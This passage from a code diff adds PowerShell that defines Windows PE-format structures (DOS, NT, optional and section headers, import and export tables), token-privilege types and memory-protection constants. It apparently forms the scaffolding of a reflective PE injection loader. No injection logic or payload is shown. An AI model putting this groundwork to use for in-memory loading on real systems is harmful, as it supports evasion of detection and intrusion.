NoteProperty -Name MachineType -Value $MachineType + + #Enum MagicType + $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16]) + $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null + $MagicType = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType + + #Enum SubSystemType + $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16]) + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null + $SubSystemType = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType + + #Enum DllCharacteristicsType + $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16]) + $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null + $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null + $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null + $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null + $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null + $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null + $DllCharacteristicsType = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType + + ########### STRUCT ########### + #Struct IMAGE_DATA_DIRECTORY + $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8) + ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null + ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null + $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY + + #Struct IMAGE_FILE_HEADER + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20) + $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null + $IMAGE_FILE_HEADER = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER + + #Struct IMAGE_OPTIONAL_HEADER64 + $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240) + ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null + ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null + ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null + ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null + ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null + ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null + ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null + ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null + ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null + ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null + ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null + ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null + ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null + ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null + ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null + ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null + ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null + ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null + ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null + ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null + ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null + ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null + ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null + ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null + ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null + ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null + ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null + ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null + ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null + ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null + ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null + ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null + ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null + ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null + ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null + ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null + ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null + ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null + ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null + ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null + ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null + ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null + $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64 + + #Struct IMAGE_OPTIONAL_HEADER32 + $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224) + ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null + ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null + ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null + ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null + ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null + ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null + ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null + ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null + ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null + ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null + ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null + ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null + ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null + ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null + ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null + ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null + ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null + ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null + ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null + ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null + ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null + ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null + ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null + ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null + ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null + ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null + ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null + ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null + ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null + ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null + ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null + ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null + ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null + ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null + ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null + ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null + ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null + ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null + ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null + ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null + ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null + ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null + ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null + ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null + $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32 + + #Struct IMAGE_NT_HEADERS64 + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264) + $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null + $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null + $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64 + + #Struct IMAGE_NT_HEADERS32 + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248) + $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null + $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null + $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32 + + #Struct IMAGE_DOS_HEADER + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64) + $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null + + $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal') + $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray + $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) + $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4)) + $e_resField.SetCustomAttribute($AttribBuilder) + + $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null + + $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal') + $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray + $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10)) + $e_res2Field.SetCustomAttribute($AttribBuilder) + + $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null + $IMAGE_DOS_HEADER = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER + + #Struct IMAGE_SECTION_HEADER + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40) + + $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal') + $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray + $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8)) + $nameField.SetCustomAttribute($AttribBuilder) + + $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null + $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER + + #Struct IMAGE_BASE_RELOCATION + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8) + $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null + $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION + + #Struct IMAGE_IMPORT_DESCRIPTOR + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20) + $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null + $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR + + #Struct IMAGE_EXPORT_DIRECTORY + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40) + $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null + $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null + $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY + + #Struct LUID + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8) + $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null + $LUID = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID + + #Struct LUID_AND_ATTRIBUTES + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12) + $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null + $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null + $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES + + #Struct TOKEN_PRIVILEGES + $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16) + $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null + $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null + $TOKEN_PRIVILEGES = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES + + return $Win32Types + } + + Function Get-Win32Constants + { + $Win32Constants = New-Object System.Object + + $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80 + $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40 + $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100 + $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000 + $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008 + $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020 + $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2 + $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0 + + return $Win32Constants + } + + Function 